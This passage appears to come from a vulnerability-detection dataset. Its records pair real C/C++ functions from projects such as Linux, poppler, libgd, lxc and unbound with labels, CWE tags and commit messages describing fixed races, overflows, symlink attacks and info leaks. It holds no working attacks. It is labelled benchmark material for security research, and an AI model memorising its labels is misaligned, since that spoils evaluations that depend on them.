CImg
|
10af1e8c1ad2a58a0a3342a856bae63e8f257abb
| 221,818,253,125,505,400,000,000,000,000,000,000,000 | 1 |
Fix other issues in 'CImg<T>::load_bmp()'.
|
static struct sock *llc_lookup_dgram(struct llc_sap *sap,
const struct llc_addr *laddr)
{
struct sock *rc;
struct hlist_nulls_node *node;
int slot = llc_sk_laddr_hashfn(sap, laddr);
struct hlist_nulls_head *laddr_hb = &sap->sk_laddr_hash[slot];
rcu_read_lock_bh();
again:
sk_nulls_for_each_rcu(rc, node, laddr_hb) {
if (llc_dgram_match(sap, laddr, rc)) {
/* Extra checks required by SLAB_DESTROY_BY_RCU */
if (unlikely(!atomic_inc_not_zero(&rc->sk_refcnt)))
goto again;
if (unlikely(llc_sk(rc)->sap != sap ||
!llc_dgram_match(sap, laddr, rc))) {
sock_put(rc);
continue;
}
goto found;
}
}
rc = NULL;
/*
* if the nulls value we got at the end of this lookup is
* not the expected one, we must restart lookup.
* We probably met an item that was moved to another chain.
*/
if (unlikely(get_nulls_value(node) != slot))
goto again;
found:
rcu_read_unlock_bh();
return rc;
}
| 0 |
[
"CWE-20",
"CWE-401"
] |
linux
|
8b74d439e1697110c5e5c600643e823eb1dd0762
| 95,772,579,997,729,260,000,000,000,000,000,000,000 | 35 |
net/llc: avoid BUG_ON() in skb_orphan()
It seems nobody used LLC since linux-3.12.
Fortunately fuzzers like syzkaller still know how to run this code,
otherwise it would be no fun.
Setting skb->sk without skb->destructor leads to all kinds of
bugs, we now prefer to be very strict about it.
Ideally here we would use skb_set_owner() but this helper does not exist yet,
only CAN seems to have a private helper for that.
Fixes: 376c7311bdb6 ("net: add a temporary sanity check in skb_orphan()")
Signed-off-by: Eric Dumazet <[email protected]>
Reported-by: Andrey Konovalov <[email protected]>
Signed-off-by: David S. Miller <[email protected]>
|
void PSOutputDev::cvtFunction(Function *func) {
SampledFunction *func0;
ExponentialFunction *func2;
StitchingFunction *func3;
PostScriptFunction *func4;
int thisFunc, m, n, nSamples, i, j, k;
switch (func->getType()) {
case -1: // identity
writePS("{}\n");
break;
case 0: // sampled
func0 = (SampledFunction *)func;
thisFunc = nextFunc++;
m = func0->getInputSize();
n = func0->getOutputSize();
nSamples = n;
for (i = 0; i < m; ++i) {
nSamples *= func0->getSampleSize(i);
}
writePSFmt("/xpdfSamples{0:d} [\n", thisFunc);
for (i = 0; i < nSamples; ++i) {
writePSFmt("{0:.6g}\n", func0->getSamples()[i]);
}
writePS("] def\n");
writePSFmt("{{ {0:d} array {1:d} array {2:d} 2 roll\n", 2*m, m, m+2);
// [e01] [efrac] x0 x1 ... xm-1
for (i = m-1; i >= 0; --i) {
// [e01] [efrac] x0 x1 ... xi
writePSFmt("{0:.6g} sub {1:.6g} mul {2:.6g} add\n",
func0->getDomainMin(i),
(func0->getEncodeMax(i) - func0->getEncodeMin(i)) /
(func0->getDomainMax(i) - func0->getDomainMin(i)),
func0->getEncodeMin(i));
// [e01] [efrac] x0 x1 ... xi-1 xi'
writePSFmt("dup 0 lt {{ pop 0 }} {{ dup {0:d} gt {{ pop {1:d} }} if }} ifelse\n",
func0->getSampleSize(i) - 1, func0->getSampleSize(i) - 1);
// [e01] [efrac] x0 x1 ... xi-1 xi'
writePS("dup floor cvi exch dup ceiling cvi exch 2 index sub\n");
// [e01] [efrac] x0 x1 ... xi-1 floor(xi') ceiling(xi') xi'-floor(xi')
writePSFmt("{0:d} index {1:d} 3 2 roll put\n", i+3, i);
// [e01] [efrac] x0 x1 ... xi-1 floor(xi') ceiling(xi')
writePSFmt("{0:d} index {1:d} 3 2 roll put\n", i+3, 2*i+1);
// [e01] [efrac] x0 x1 ... xi-1 floor(xi')
writePSFmt("{0:d} index {1:d} 3 2 roll put\n", i+2, 2*i);
// [e01] [efrac] x0 x1 ... xi-1
}
// [e01] [efrac]
for (i = 0; i < n; ++i) {
// [e01] [efrac] y(0) ... y(i-1)
for (j = 0; j < (1<<m); ++j) {
// [e01] [efrac] y(0) ... y(i-1) s(0) s(1) ... s(j-1)
writePSFmt("xpdfSamples{0:d}\n", thisFunc);
k = m - 1;
writePSFmt("{0:d} index {1:d} get\n", i+j+2, 2 * k + ((j >> k) & 1));
for (k = m - 2; k >= 0; --k) {
writePSFmt("{0:d} mul {1:d} index {2:d} get add\n",
func0->getSampleSize(k),
i + j + 3,
2 * k + ((j >> k) & 1));
}
if (n > 1) {
writePSFmt("{0:d} mul {1:d} add ", n, i);
}
writePS("get\n");
}
// [e01] [efrac] y(0) ... y(i-1) s(0) s(1) ... s(2^m-1)
for (j = 0; j < m; ++j) {
// [e01] [efrac] y(0) ... y(i-1) s(0) s(1) ... s(2^(m-j)-1)
for (k = 0; k < (1 << (m - j)); k += 2) {
// [e01] [efrac] y(0) ... y(i-1) <k/2 s' values> <2^(m-j)-k s values>
writePSFmt("{0:d} index {1:d} get dup\n",
i + k/2 + (1 << (m-j)) - k, j);
writePS("3 2 roll mul exch 1 exch sub 3 2 roll mul add\n");
writePSFmt("{0:d} 1 roll\n", k/2 + (1 << (m-j)) - k - 1);
}
// [e01] [efrac] s'(0) s'(1) ... s(2^(m-j-1)-1)
}
// [e01] [efrac] y(0) ... y(i-1) s
writePSFmt("{0:.6g} mul {1:.6g} add\n",
func0->getDecodeMax(i) - func0->getDecodeMin(i),
func0->getDecodeMin(i));
writePSFmt("dup {0:.6g} lt {{ pop {1:.6g} }} {{ dup {2:.6g} gt {{ pop {3:.6g} }} if }} ifelse\n",
func0->getRangeMin(i), func0->getRangeMin(i),
func0->getRangeMax(i), func0->getRangeMax(i));
// [e01] [efrac] y(0) ... y(i-1) y(i)
}
// [e01] [efrac] y(0) ... y(n-1)
writePSFmt("{0:d} {1:d} roll pop pop }}\n", n+2, n);
break;
case 2: // exponential
func2 = (ExponentialFunction *)func;
n = func2->getOutputSize();
writePSFmt("{{ dup {0:.6g} lt {{ pop {1:.6g} }} {{ dup {2:.6g} gt {{ pop {3:.6g} }} if }} ifelse\n",
func2->getDomainMin(0), func2->getDomainMin(0),
func2->getDomainMax(0), func2->getDomainMax(0));
// x
for (i = 0; i < n; ++i) {
// x y(0) .. y(i-1)
writePSFmt("{0:d} index {1:.6g} exp {2:.6g} mul {3:.6g} add\n",
i, func2->getE(), func2->getC1()[i] - func2->getC0()[i],
func2->getC0()[i]);
if (func2->getHasRange()) {
writePSFmt("dup {0:.6g} lt {{ pop {1:.6g} }} {{ dup {2:.6g} gt {{ pop {3:.6g} }} if }} ifelse\n",
func2->getRangeMin(i), func2->getRangeMin(i),
func2->getRangeMax(i), func2->getRangeMax(i));
}
}
// x y(0) .. y(n-1)
writePSFmt("{0:d} {1:d} roll pop }}\n", n+1, n);
break;
case 3: // stitching
func3 = (StitchingFunction *)func;
thisFunc = nextFunc++;
for (i = 0; i < func3->getNumFuncs(); ++i) {
cvtFunction(func3->getFunc(i));
writePSFmt("/xpdfFunc{0:d}_{1:d} exch def\n", thisFunc, i);
}
writePSFmt("{{ dup {0:.6g} lt {{ pop {1:.6g} }} {{ dup {2:.6g} gt {{ pop {3:.6g} }} if }} ifelse\n",
func3->getDomainMin(0), func3->getDomainMin(0),
func3->getDomainMax(0), func3->getDomainMax(0));
for (i = 0; i < func3->getNumFuncs() - 1; ++i) {
writePSFmt("dup {0:.6g} lt {{ {1:.6g} sub {2:.6g} mul {3:.6g} add xpdfFunc{4:d}_{5:d} }} {{\n",
func3->getBounds()[i+1],
func3->getBounds()[i],
func3->getScale()[i],
func3->getEncode()[2*i],
thisFunc, i);
}
writePSFmt("{0:.6g} sub {1:.6g} mul {2:.6g} add xpdfFunc{3:d}_{4:d}\n",
func3->getBounds()[i],
func3->getScale()[i],
func3->getEncode()[2*i],
thisFunc, i);
for (i = 0; i < func3->getNumFuncs() - 1; ++i) {
writePS("} ifelse\n");
}
writePS("}\n");
break;
case 4: // PostScript
func4 = (PostScriptFunction *)func;
writePS(func4->getCodeString()->getCString());
writePS("\n");
break;
}
}
| 0 |
[] |
poppler
|
abf167af8b15e5f3b510275ce619e6fdb42edd40
| 135,564,037,139,989,370,000,000,000,000,000,000,000 | 151 |
Implement tiling/patterns in SplashOutputDev
Fixes bug 13518
|
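The case-0 branch of cvtFunction above compiles a PDF sampled (type 0) function into PostScript that fetches the 2^m samples surrounding the input point and blends them pairwise. As a reading aid, here is a minimal C model of that multilinear interpolation — hypothetical names, not the poppler API; the encode/decode scaling and range clamping the emitted PostScript also performs are omitted, and e[k] is assumed to already be an in-range sample-space coordinate.

#include <math.h>

/* Blend the 2^m samples surrounding point e[0..m-1]. `samples` is laid
 * out as in the emitted xpdfSamples array: the index varies fastest
 * over dimension 0, and each sample holds n output components. */
static double sample_interp(const double *samples, const int *size,
                            int m, int n, const double *e, int out)
{
    double acc = 0.0;
    for (int corner = 0; corner < (1 << m); corner++) {
        int idx = 0;
        double w = 1.0;
        for (int k = m - 1; k >= 0; k--) {
            int lo = (int)floor(e[k]);
            int hi = (int)ceil(e[k]);
            double frac = e[k] - lo;
            int bit = (corner >> k) & 1;    /* pick floor or ceiling */
            idx = idx * size[k] + (bit ? hi : lo);
            w *= bit ? frac : 1.0 - frac;
        }
        acc += w * samples[idx * n + out];
    }
    return acc;
}

Each corner contributes its sample weighted by the product of per-axis fractions, which is what the stack-shuffling loop over j in the PostScript computes one axis at a time.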
const char * cli_get_last_virus_str(const cli_ctx * ctx)
{
const char * ret;
if ((ret = cli_get_last_virus(ctx)))
return ret;
return "";
}
| 0 |
[] |
clamav-devel
|
167c0079292814ec5523d0b97a9e1b002bf8819b
| 75,222,859,842,360,630,000,000,000,000,000,000,000 | 7 |
fix 0.99.3 false negative of virus Pdf.Exploit.CVE_2016_1046-1.
|
perf_lock_task_context(struct task_struct *task, int ctxn, unsigned long *flags)
{
struct perf_event_context *ctx;
retry:
/*
* One of the few rules of preemptible RCU is that one cannot do
* rcu_read_unlock() while holding a scheduler (or nested) lock when
* part of the read side critical section was irqs-enabled -- see
* rcu_read_unlock_special().
*
* Since ctx->lock nests under rq->lock we must ensure the entire read
* side critical section has interrupts disabled.
*/
local_irq_save(*flags);
rcu_read_lock();
ctx = rcu_dereference(task->perf_event_ctxp[ctxn]);
if (ctx) {
/*
* If this context is a clone of another, it might
* get swapped for another underneath us by
* perf_event_task_sched_out, though the
* rcu_read_lock() protects us from any context
* getting freed. Lock the context and check if it
* got swapped before we could get the lock, and retry
* if so. If we locked the right context, then it
* can't get swapped on us any more.
*/
raw_spin_lock(&ctx->lock);
if (ctx != rcu_dereference(task->perf_event_ctxp[ctxn])) {
raw_spin_unlock(&ctx->lock);
rcu_read_unlock();
local_irq_restore(*flags);
goto retry;
}
if (ctx->task == TASK_TOMBSTONE ||
!atomic_inc_not_zero(&ctx->refcount)) {
raw_spin_unlock(&ctx->lock);
ctx = NULL;
} else {
WARN_ON_ONCE(ctx->task != task);
}
}
rcu_read_unlock();
if (!ctx)
local_irq_restore(*flags);
return ctx;
}
| 0 |
[
"CWE-362",
"CWE-125"
] |
linux
|
321027c1fe77f892f4ea07846aeae08cefbbb290
| 53,432,108,112,823,630,000,000,000,000,000,000,000 | 49 |
perf/core: Fix concurrent sys_perf_event_open() vs. 'move_group' race
Di Shen reported a race between two concurrent sys_perf_event_open()
calls where both try and move the same pre-existing software group
into a hardware context.
The problem is exactly that described in commit:
f63a8daa5812 ("perf: Fix event->ctx locking")
... where, while we wait for a ctx->mutex acquisition, the event->ctx
relation can have changed under us.
That very same commit failed to recognise sys_perf_event_context() as an
external access vector to the events and thereby didn't apply the
established locking rules correctly.
So while one sys_perf_event_open() call is stuck waiting on
mutex_lock_double(), the other (which owns said locks) moves the group
about. So by the time the former sys_perf_event_open() acquires the
locks, the context we've acquired is stale (and possibly dead).
Apply the established locking rules as per perf_event_ctx_lock_nested()
to the mutex_lock_double() for the 'move_group' case. This obviously means
we need to validate state after we acquire the locks.
Reported-by: Di Shen (Keen Lab)
Tested-by: John Dias <[email protected]>
Signed-off-by: Peter Zijlstra (Intel) <[email protected]>
Cc: Alexander Shishkin <[email protected]>
Cc: Arnaldo Carvalho de Melo <[email protected]>
Cc: Arnaldo Carvalho de Melo <[email protected]>
Cc: Jiri Olsa <[email protected]>
Cc: Kees Cook <[email protected]>
Cc: Linus Torvalds <[email protected]>
Cc: Min Chong <[email protected]>
Cc: Peter Zijlstra <[email protected]>
Cc: Stephane Eranian <[email protected]>
Cc: Thomas Gleixner <[email protected]>
Cc: Vince Weaver <[email protected]>
Fixes: f63a8daa5812 ("perf: Fix event->ctx locking")
Link: http://lkml.kernel.org/r/[email protected]
Signed-off-by: Ingo Molnar <[email protected]>
|
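The retry loop in perf_lock_task_context() is an instance of a general lock-then-revalidate pattern: dereference a shared slot, lock the object it points to, then confirm the slot still points at that object before trusting it. A hedged userspace sketch — the kernel relies on RCU plus a refcount for object lifetime; here the objects are simply assumed never to be freed:

#include <pthread.h>
#include <stdatomic.h>
#include <stddef.h>

struct ctx {
    pthread_mutex_t lock;
    int dead;
};

/* Lock whatever `slot` currently points to, retrying if the slot is
 * repointed (or the object dies) while we wait for the mutex. */
struct ctx *lock_current_ctx(_Atomic(struct ctx *) *slot)
{
    for (;;) {
        struct ctx *c = atomic_load(slot);
        if (!c)
            return NULL;
        pthread_mutex_lock(&c->lock);
        if (c == atomic_load(slot) && !c->dead)
            return c;                  /* locked the right object */
        pthread_mutex_unlock(&c->lock);
        /* slot was swapped underneath us: start over */
    }
}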
static int appendDynamic(dynamicPtr * dp, const void *src, int size)
{
int bytesNeeded;
char *tmp;
if(!dp->dataGood) {
return FALSE;
}
/* bytesNeeded = dp->logicalSize + size; */
bytesNeeded = dp->pos + size;
if(bytesNeeded > dp->realSize) {
/* 2.0.21 */
if(!dp->freeOK) {
return FALSE;
}
if(overflow2(dp->realSize, 2)) {
return FALSE;
}
if(!gdReallocDynamic(dp, bytesNeeded * 2)) {
dp->dataGood = FALSE;
return FALSE;
}
}
/* if we get here, we can be sure that we have enough bytes
* to copy safely */
/*printf("Mem OK Size: %d, Pos: %d\n", dp->realSize, dp->pos); */
tmp = (char *)dp->data;
memcpy ((void *)(tmp + (dp->pos)), src, size);
dp->pos += size;
if(dp->pos > dp->logicalSize) {
dp->logicalSize = dp->pos;
};
return TRUE;
}
| 0 |
[
"CWE-119",
"CWE-787"
] |
libgd
|
53110871935244816bbb9d131da0bccff734bfe9
| 53,218,732,506,537,070,000,000,000,000,000,000,000 | 43 |
Avoid potentially dangerous signed to unsigned conversion
We make sure to never pass a negative `rlen` as size to memcpy(). See
also <https://bugs.php.net/bug.php?id=73280>.
Patch provided by Emmanuel Law.
|
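The overflow2(dp->realSize, 2) guard above is what keeps the doubling from wrapping. A minimal sketch of the same idea in isolation — hypothetical helper, not the libgd API — checking both the position arithmetic and the growth arithmetic before touching memory:

#include <limits.h>
#include <stdlib.h>
#include <string.h>

/* Append `need` bytes to a growable buffer, rejecting any arithmetic
 * that would overflow int before it can corrupt the allocation size. */
static int append_checked(char **buf, int *cap, int *pos,
                          const void *src, int need)
{
    if (need < 0 || *pos > INT_MAX - need)
        return 0;                      /* pos + need would overflow */
    if (*pos + need > *cap) {
        int want = *pos + need;
        if (want > INT_MAX / 2)
            return 0;                  /* want * 2 would overflow */
        char *tmp = realloc(*buf, (size_t)want * 2);
        if (!tmp)
            return 0;
        *buf = tmp;
        *cap = want * 2;
    }
    memcpy(*buf + *pos, src, (size_t)need);
    *pos += need;
    return 1;
}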
qb_ipc_us_recv_at_most(struct qb_ipc_one_way *one_way,
void *msg, size_t len, int32_t timeout)
{
int32_t result;
int32_t final_rc = 0;
int32_t to_recv = 0;
char *data = msg;
struct ipc_us_control *ctl = NULL;
int32_t time_waited = 0;
int32_t time_to_wait = timeout;
if (timeout == -1) {
time_to_wait = 1000;
}
qb_sigpipe_ctl(QB_SIGPIPE_IGNORE);
retry_peek:
result = recv(one_way->u.us.sock, data,
sizeof(struct qb_ipc_request_header),
MSG_NOSIGNAL | MSG_PEEK);
if (result == -1) {
if (errno != EAGAIN) {
final_rc = -errno;
if (use_filesystem_sockets()) {
if (errno == ECONNRESET || errno == EPIPE) {
final_rc = -ENOTCONN;
}
}
goto cleanup_sigpipe;
}
/* check to see if we have enough time left to try again */
if (time_waited < timeout || timeout == -1) {
result = qb_ipc_us_ready(one_way, NULL, time_to_wait, POLLIN);
if (qb_ipc_us_sock_error_is_disconnected(result)) {
final_rc = result;
goto cleanup_sigpipe;
}
time_waited += time_to_wait;
goto retry_peek;
} else if (time_waited >= timeout) {
final_rc = -ETIMEDOUT;
goto cleanup_sigpipe;
}
}
if (result >= sizeof(struct qb_ipc_request_header)) {
struct qb_ipc_request_header *hdr = NULL;
hdr = (struct qb_ipc_request_header *)msg;
to_recv = hdr->size;
}
result = recv(one_way->u.us.sock, data, to_recv,
MSG_NOSIGNAL | MSG_WAITALL);
if (result == -1) {
final_rc = -errno;
goto cleanup_sigpipe;
} else if (result == 0) {
qb_util_log(LOG_DEBUG, "recv == 0 -> ENOTCONN");
final_rc = -ENOTCONN;
goto cleanup_sigpipe;
}
final_rc = result;
ctl = (struct ipc_us_control *)one_way->u.us.shared_data;
if (ctl) {
(void)qb_atomic_int_dec_and_test(&ctl->sent);
}
cleanup_sigpipe:
qb_sigpipe_ctl(QB_SIGPIPE_DEFAULT);
return final_rc;
}
| 0 |
[
"CWE-59"
] |
libqb
|
e322e98dc264bc5911d6fe1d371e55ac9f95a71e
| 93,453,098,895,810,540,000,000,000,000,000,000,000 | 77 |
ipc: use O_EXCL on SHM files, and randomize the names
Signed-off-by: Christine Caulfield <[email protected]>
|
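The commit message above names the two ingredients of the fix: O_EXCL, so creation fails rather than reusing a file (or following a symlink) planted by an attacker, and unpredictable names. A hedged POSIX sketch — helper name and retry policy are hypothetical, and random() stands in for a proper CSPRNG:

#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/mman.h>
#include <unistd.h>

/* Create a fresh SHM object with an unpredictable name. O_CREAT|O_EXCL
 * guarantees we never open a pre-existing (attacker-controlled) file. */
static int create_private_shm(char *name_out, size_t name_len, size_t size)
{
    for (int attempt = 0; attempt < 10; attempt++) {
        snprintf(name_out, name_len, "/qb-demo-%d-%ld",
                 (int)getpid(), random());
        int fd = shm_open(name_out, O_RDWR | O_CREAT | O_EXCL, 0600);
        if (fd < 0)
            continue;                  /* name already taken: retry */
        if (ftruncate(fd, (off_t)size) == 0)
            return fd;
        close(fd);
        shm_unlink(name_out);
        return -1;
    }
    return -1;
}

On older glibc this needs -lrt at link time, and production code should draw the suffix from a cryptographically strong source rather than random().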
static int sig_ignored(struct task_struct *t, int sig, int from_ancestor_ns)
{
/*
* Blocked signals are never ignored, since the
* signal handler may change by the time it is
* unblocked.
*/
if (sigismember(&t->blocked, sig) || sigismember(&t->real_blocked, sig))
return 0;
if (!sig_task_ignored(t, sig, from_ancestor_ns))
return 0;
/*
* Tracers may want to know about even ignored signals.
*/
return !tracehook_consider_ignored_signal(t, sig);
}
| 0 |
[] |
linux-2.6
|
0083fc2c50e6c5127c2802ad323adf8143ab7856
| 56,020,556,380,315,860,000,000,000,000,000,000,000 | 18 |
do_sigaltstack: avoid copying 'stack_t' as a structure to user space
Ulrich Drepper correctly points out that there is generally padding in
the structure on 64-bit hosts, and that copying the structure from
kernel to user space can leak information from the kernel stack in those
padding bytes.
Avoid the whole issue by just copying the three members one by one
instead, which also means that the function also can avoid the need for
a stack frame. This also happens to match how we copy the new structure
from user space, so it all even makes sense.
[ The obvious solution of adding a memset() generates horrid code, gcc
does really stupid things. ]
Reported-by: Ulrich Drepper <[email protected]>
Signed-off-by: Linus Torvalds <[email protected]>
|
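The fix described above replaces a whole-struct copy to user space with per-member copies because compiler-inserted padding in the kernel-side struct carries stale stack bytes. A userspace model of the same hazard and remedy, with a hypothetical layout:

#include <stddef.h>
#include <string.h>

/* On LP64, 4 bytes of padding typically follow `flags`; copying the
 * struct wholesale would export whatever garbage sits in them. */
struct stack_desc {
    void  *sp;
    int    flags;
    size_t size;
};

static void export_stack_desc(struct stack_desc *wire,
                              void *sp, int flags, size_t size)
{
    memset(wire, 0, sizeof(*wire));   /* clear padding explicitly */
    wire->sp = sp;
    wire->flags = flags;
    wire->size = size;
    /* alternatively: copy the three members to user space one by one,
     * never the struct as a unit */
}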
int in_caplist(int cap, struct lxc_list *caps)
{
struct lxc_list *iterator;
int capid;
lxc_list_for_each(iterator, caps) {
capid = parse_cap(iterator->elem);
if (capid == cap)
return 1;
}
return 0;
}
| 0 |
[
"CWE-59",
"CWE-61"
] |
lxc
|
592fd47a6245508b79fe6ac819fe6d3b2c1289be
| 170,730,645,541,108,340,000,000,000,000,000,000,000 | 13 |
CVE-2015-1335: Protect container mounts against symlinks
When a container starts up, lxc sets up the container's inital fstree
by doing a bunch of mounting, guided by the container configuration
file. The container config is owned by the admin or user on the host,
so we do not try to guard against bad entries. However, since the
mount target is in the container, it's possible that the container admin
could divert the mount with symbolic links. This could bypass proper
container startup (i.e. confinement of a root-owned container by the
restrictive apparmor policy, by diverting the required write to
/proc/self/attr/current), or bypass the (path-based) apparmor policy
by diverting, say, /proc to /mnt in the container.
To prevent this,
1. do not allow mounts to paths containing symbolic links
2. do not allow bind mounts from relative paths containing symbolic
links.
Details:
Define safe_mount which ensures that the container has not inserted any
symbolic links into any mount targets for mounts to be done during
container setup.
The host's mount path may contain symbolic links. As it is under the
control of the administrator, that's ok. So safe_mount begins the check
for symbolic links after the rootfs->mount, by opening that directory.
It opens each directory along the path using openat() relative to the
parent directory using O_NOFOLLOW. When the target is reached, it
mounts onto /proc/self/fd/<targetfd>.
Use safe_mount() in mount_entry(), when mounting container proc,
and when needed. In particular, safe_mount() need not be used in
any case where:
1. the mount is done in the container's namespace
2. the mount is for the container's rootfs
3. the mount is relative to a tmpfs or proc/sysfs which we have
just safe_mount()ed ourselves
Since we were using proc/net as a temporary placeholder for /proc/sys/net
during container startup, and proc/net is a symbolic link, use proc/tty
instead.
Update the lxc.container.conf manpage with details about the new
restrictions.
Finally, add a testcase to test some symbolic link possibilities.
Reported-by: Roman Fiedler
Signed-off-by: Serge Hallyn <[email protected]>
Acked-by: Stéphane Graber <[email protected]>
|
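The heart of safe_mount() as described above is a component-by-component walk that refuses symlinks. A simplified, hedged sketch of such a walk — error handling abbreviated, helper name hypothetical; the returned fd can then be mounted on via the /proc/self/fd/<fd> trick the commit message mentions, a target the container cannot divert:

#define _GNU_SOURCE
#include <fcntl.h>
#include <string.h>
#include <unistd.h>

/* Open rel_path beneath root_fd, one component at a time. O_NOFOLLOW
 * makes openat() fail with ELOOP on any symlink, aborting the walk. */
static int open_beneath(int root_fd, const char *rel_path)
{
    char buf[4096];
    strncpy(buf, rel_path, sizeof(buf) - 1);
    buf[sizeof(buf) - 1] = '\0';

    int fd = dup(root_fd);
    for (char *p = strtok(buf, "/"); p && fd >= 0; p = strtok(NULL, "/")) {
        int next = openat(fd, p, O_PATH | O_NOFOLLOW | O_CLOEXEC);
        close(fd);
        fd = next;                     /* -1 (e.g. ELOOP) ends the walk */
    }
    return fd;
}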
static void sub_remove(struct idr *idp, int shift, int id)
{
struct idr_layer *p = idp->top;
struct idr_layer **pa[MAX_LEVEL];
struct idr_layer ***paa = &pa[0];
struct idr_layer *to_free;
int n;
*paa = NULL;
*++paa = &idp->top;
while ((shift > 0) && p) {
n = (id >> shift) & IDR_MASK;
__clear_bit(n, &p->bitmap);
*++paa = &p->ary[n];
p = p->ary[n];
shift -= IDR_BITS;
}
n = id & IDR_MASK;
if (likely(p != NULL && test_bit(n, &p->bitmap))){
__clear_bit(n, &p->bitmap);
rcu_assign_pointer(p->ary[n], NULL);
to_free = NULL;
while(*paa && ! --((**paa)->count)){
if (to_free)
free_layer(to_free);
to_free = **paa;
**paa-- = NULL;
}
if (!*paa)
idp->layers = 0;
if (to_free)
free_layer(to_free);
} else
idr_remove_warning(id);
}
| 0 |
[] |
linux
|
2dcb22b346be7b7b7e630a8970d69cf3f1111ec1
| 285,481,430,249,634,560,000,000,000,000,000,000,000 | 36 |
idr: fix backtrack logic in idr_remove_all
Currently idr_remove_all will fail with a use after free error if
idr::layers is bigger than 2, which on 32 bit systems corresponds to items
more than 1024. This is due to stepping back too many levels during
backtracking. For simplicity let's assume that IDR_BITS=1 -> we have 2
nodes at each level below the root node and each leaf node stores two IDs.
(In reality for 32 bit systems IDR_BITS=5, with 32 nodes at each sub-root
level and 32 IDs in each leaf node). The sequence of freeing the nodes at
the moment is as follows:
layer
1  ->               a(7)
2  ->       b(3)           c(5)
3  ->    d(1)  e(2)     f(4)  g(6)
Until step 4 things go fine, but then node c is freed, whereas node g
should be freed first. Since node c contains the pointer to node g we'll
have a use after free error at step 6.
How many levels we step back after visiting the leaf nodes is currently
determined by the msb of the id we are currently visiting:
Step
1. node d with IDs 0,1 is freed, current ID is advanced to 2.
msb of the current ID bit 1. This means we need to step back
1 level to node b and take the next sibling, node e.
2-3. node e with IDs 2,3 is freed, current ID is 4, msb is bit 2.
This means we need to step back 2 levels to node a, freeing
node b on the way.
4-5. node f with IDs 4,5 is freed, current ID is 6, msb is still
bit 2. This means we again need to step back 2 levels to node
a and free c on the way.
6. We should visit node g, but its pointer is not available as
node c was freed.
The fix changes how we determine the number of levels to step back.
Instead of deducting this merely from the msb of the current ID, we should
really check if advancing the ID causes an overflow to a bit position
corresponding to a given layer. In the above example overflow from bit 0
to bit 1 should mean stepping back 1 level. Overflow from bit 1 to bit 2
should mean stepping back 2 levels and so on.
The fix was tested with IDs up to 1 << 20, which corresponds to 4 layers
on 32 bit systems.
Signed-off-by: Imre Deak <[email protected]>
Reviewed-by: Tejun Heo <[email protected]>
Cc: Eric Paris <[email protected]>
Cc: "Paul E. McKenney" <[email protected]>
Cc: <[email protected]> [2.6.34.1]
Signed-off-by: Andrew Morton <[email protected]>
Signed-off-by: Linus Torvalds <[email protected]>
|
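The corrected rule in the commit message — step back one level per bit-group the ID increment carried into — can be modeled directly. A hypothetical helper, assuming IDR_BITS-wide index groups and ignoring the bits that only select a slot within a leaf:

/* How many tree levels above the leaf changed when the ID advanced?
 * The XOR exposes every bit touched by the carry; the lowest idr_bits
 * only select a slot inside the leaf, so they are shifted off first. */
static int levels_to_step_back(unsigned int old_id, unsigned int new_id,
                               int idr_bits)
{
    unsigned int diff = (old_id ^ new_id) >> idr_bits;
    int levels = 0;
    while (diff) {
        levels++;
        diff >>= idr_bits;
    }
    return levels;
}

With idr_bits = 1 this reproduces the commit's example: advancing from ID 1 to 2 steps back one level, from 3 to 4 two levels, and from 5 to 6 only one level — the case where the old msb-based rule stepped back too far and freed node c before visiting g.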
TEST(Random, FixedSeed) {
// clang-format off
struct ConstantRNG {
typedef uint32_t result_type;
result_type operator()() {
return 4; // chosen by fair dice roll.
// guaranteed to be random.
}
static constexpr result_type min() {
return std::numeric_limits<result_type>::min();
}
static constexpr result_type max() {
return std::numeric_limits<result_type>::max();
}
};
// clang-format on
ConstantRNG gen;
// Pick a constant random number...
auto value = Random::rand32(10, gen);
// Loop to make sure it really is constant.
for (int i = 0; i < 1024; ++i) {
auto result = Random::rand32(10, gen);
EXPECT_EQ(value, result);
}
}
| 0 |
[
"CWE-119",
"CWE-787"
] |
folly
|
8e927ee48b114c8a2f90d0cbd5ac753795a6761f
| 248,597,193,952,926,570,000,000,000,000,000,000,000 | 28 |
Flush secureRandom buffer on fork
Summary: On fork, flush the secureRandom buffer, so that we don't share entropy between the parent and child.
Reviewed By: ricklavoie
Differential Revision: D9196474
fbshipit-source-id: 12ff8488d814466186df61328a5f1d4000beb27f
|
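The fix above is the classic pthread_atfork() remedy: after fork(), any buffered CSPRNG output is shared by parent and child, so a child-side handler must discard it. A minimal C sketch with a hypothetical buffer layout:

#include <pthread.h>
#include <string.h>

static unsigned char rng_buf[4096];
static size_t rng_avail;    /* unread bytes left in rng_buf */

/* Runs in the child immediately after fork(): drop buffered entropy so
 * parent and child never hand out the same "random" bytes. */
static void rng_flush_after_fork(void)
{
    memset(rng_buf, 0, sizeof(rng_buf));
    rng_avail = 0;          /* force a kernel refill on next use */
}

static void rng_init(void)
{
    (void)pthread_atfork(NULL, NULL, rng_flush_after_fork);
}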
delegpt_set_name(struct delegpt* dp, struct regional* region, uint8_t* name)
{
log_assert(!dp->dp_type_mlc);
dp->namelabs = dname_count_size_labels(name, &dp->namelen);
dp->name = regional_alloc_init(region, name, dp->namelen);
return dp->name != 0;
}
| 0 |
[
"CWE-400"
] |
unbound
|
ba0f382eee814e56900a535778d13206b86b6d49
| 259,026,295,615,259,600,000,000,000,000,000,000,000 | 7 |
- CVE-2020-12662 Unbound can be tricked into amplifying an incoming
query into a large number of queries directed to a target.
- CVE-2020-12663 Malformed answers from upstream name servers can be
used to make Unbound unresponsive.
|
bash_default_completion (text, start, end, qc, compflags)
const char *text;
int start, end, qc, compflags;
{
char **matches, *t;
matches = (char **)NULL;
/* New posix-style command substitution or variable name? */
if (!matches && *text == '$')
{
if (qc != '\'' && text[1] == '(') /* ) */
matches = rl_completion_matches (text, command_subst_completion_function);
else
{
matches = rl_completion_matches (text, variable_completion_function);
/* If a single match, see if it expands to a directory name and append
a slash if it does. This requires us to expand the variable name,
so we don't want to display errors if the variable is unset. This
can happen with dynamic variables whose value has never been
requested. */
if (matches && matches[0] && matches[1] == 0)
{
t = savestring (matches[0]);
bash_filename_stat_hook (&t);
/* doesn't use test_for_directory because that performs tilde
expansion */
if (file_isdir (t))
rl_completion_append_character = '/';
free (t);
}
}
}
/* If the word starts in `~', and there is no slash in the word, then
try completing this word as a username. */
if (matches == 0 && *text == '~' && mbschr (text, '/') == 0)
matches = rl_completion_matches (text, rl_username_completion_function);
/* Another one. Why not? If the word starts in '@', then look through
the world of known hostnames for completion first. */
